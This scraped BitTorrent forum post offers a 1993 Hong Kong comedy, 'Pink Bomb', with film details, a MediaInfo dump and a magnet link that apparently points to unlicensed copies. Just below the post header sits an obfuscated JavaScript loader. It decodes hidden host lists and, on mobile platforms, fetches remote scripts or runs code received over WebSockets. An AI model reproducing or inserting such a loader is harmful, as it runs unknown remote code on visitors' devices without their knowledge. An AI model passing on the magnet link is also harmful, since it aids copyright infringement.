人生得意衰尽欢[国语配音/粤语配音/中文字幕].Pink.Bomb.1993.1080p.BluRay.x265.10bit.DTS.2.0.2Audio 6.81GB

版主小s 1月前 324

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 人生得意衰尽欢 / 红粉兵团 / Pink Bomb
◎片  名 人生得意衰盡歡
◎年  代 1993
◎产  地 中国香港
◎类  别 喜剧
◎语  言 粤语
◎上映日期 1993-03-27
◎IMDb链接 https://www.imdb.com/title/tt0107947/
◎豆瓣评分 6.1/10 (908人评价)
◎豆瓣链接 https://movie.douban.com/subject/1780552/
◎片  长 95 分钟
◎导  演 赵崇基 Sung Kee Chiu (id:1280689)
◎编  剧 黄子华 Dayo Wong (id:1051476)
◎演  员 杨丽菁 Cynthia Khan (id:1037356)
       刘青云 Sean Lau (id:1007251)
       李子雄 Waise Lee (id:1037662)
       李丽珍 Loletta Lee (id:1016848)
       黄子华 Dayo Wong (id:1051476)
       袁洁莹 Fennie Yuen (id:1051082)
       叶蕴仪 Gloria Yip (id:1014952)
       马安 An Ma (id:1418395)
       宝佩如 Baby Bo (id:1388460)
       冯克安 Hark-On Fung (id:1283563)
       潘冰嫦 Bin Seung Poon (id:1321972)
       陈裕光 Yu Guang Chen (id:1280585)
       何添 Tim Ho (id:1408607)
       彭伟华 Wai Wah Pang (id:1370961)
       何永祥 Wing Cheung Ho (id:1361255)

◎标  签 黄子华 / 香港 / 刘青云 / 喜剧 / 香港电影 / 李丽珍 / 1993 / 袁洁莹

◎简  介
  在[日月旅行社]内一个[团友交谊会]上,看似虔诚基督的领队,其实是卧底国际刑警,他往泰国目的是以旅行团领队的身份,追查一宗伪钞案。一到曼谷,他便展开调查,无奈却发现伪钞集团因风声太紧,早已停止活动,茫无线索之下...... 刺激,搞鬼的故事由此展开!                                    
                                其中在戏里黄子华用超市和快餐店的名称讲的粗口顺口溜,相当搞鬼!!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 102267324362078131718230367395150492916 (0x4CEFF86121FEF58DB946FCDB681EF4F4)

  4. Complete name                            : [email protected]DQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.81 GiB

  8. Duration                                 : 1 h 29 min

  9. Overall bit rate                         : 10.8 Mb/s

  10. Movie name                               : Pink Bomb 1993

  11. Encoded date                             : UTC 2021-08-01 03:19:44

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 29 min

  23. Bit rate                                 : 7 778 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 16:9

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 25.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.150

  33. Stream size                              : 4.88 GiB (72%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=21.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio #1

  39. ID                                       : 2

  40. ID in the original source medium         : 4352 (0x1100)

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 29 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 509 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 16 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 970 MiB (14%)

  54. Title                                    : Cantonese

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No

  58. Original source medium                   : Blu-ray


  59. Audio #2

  60. ID                                       : 3

  61. ID in the original source medium         : 4353 (0x1101)

  62. Format                                   : DTS

  63. Format/Info                              : Digital Theater Systems

  64. Codec ID                                 : A_DTS

  65. Duration                                 : 1 h 29 min

  66. Bit rate mode                            : Constant

  67. Bit rate                                 : 1 509 kb/s

  68. Channel(s)                               : 2 channels

  69. Channel layout                           : L R

  70. Sampling rate                            : 48.0 kHz

  71. Frame rate                               : 93.750 FPS (512 SPF)

  72. Bit depth                                : 16 bits

  73. Compression mode                         : Lossy

  74. Stream size                              : 970 MiB (14%)

  75. Title                                    : Mandarin

  76. Language                                 : Chinese

  77. Default                                  : No

  78. Forced                                   : No

  79. Original source medium                   : Blu-ray


  80. Text #1

  81. ID                                       : 4

  82. ID in the original source medium         : 4609 (0x1201)

  83. Format                                   : PGS

  84. Muxing mode                              : zlib

  85. Codec ID                                 : S_HDMV/PGS

  86. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration                                 : 1 h 27 min

  88. Bit rate                                 : 45.2 kb/s

  89. Count of elements                        : 2454

  90. Stream size                              : 28.4 MiB (0%)

  91. Title                                    : chs

  92. Language                                 : Chinese

  93. Default                                  : No

  94. Forced                                   : No

  95. Original source medium                   : Blu-ray


  96. Text #2

  97. ID                                       : 5

  98. ID in the original source medium         : 4608 (0x1200)

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 27 min

  104. Bit rate                                 : 46.1 kb/s

  105. Count of elements                        : 2454

  106. Stream size                              : 28.9 MiB (0%)

  107. Title                                    : cht

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No

  111. Original source medium                   : Blu-ray


  112. Text #3

  113. ID                                       : 6

  114. ID in the original source medium         : 4610 (0x1202)

  115. Format                                   : PGS

  116. Muxing mode                              : zlib

  117. Codec ID                                 : S_HDMV/PGS

  118. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration                                 : 1 h 27 min

  120. Bit rate                                 : 49.7 kb/s

  121. Count of elements                        : 2454

  122. Stream size                              : 31.2 MiB (0%)

  123. Language                                 : English

  124. Default                                  : No

  125. Forced                                   : No

  126. Original source medium                   : Blu-ray


  127. Menu

  128. 00:00:00.000                             : Chapter 01

  129. 00:07:35.400                             : Chapter 02

  130. 00:14:53.320                             : Chapter 03

  131. 00:21:58.560                             : Chapter 04

  132. 00:30:52.920                             : Chapter 05

  133. 00:38:59.760                             : Chapter 06

  134. 00:44:04.440                             : Chapter 07

  135. 00:52:13.640                             : Chapter 08

  136. 01:01:36.240                             : Chapter 09

  137. 01:09:17.600                             : Chapter 10

  138. 01:16:38.400                             : Chapter 11

  139. 01:22:31.800                             : Chapter 12


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:3D85AC7D25D6D024ED640F4297834AD23DCDAA42
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回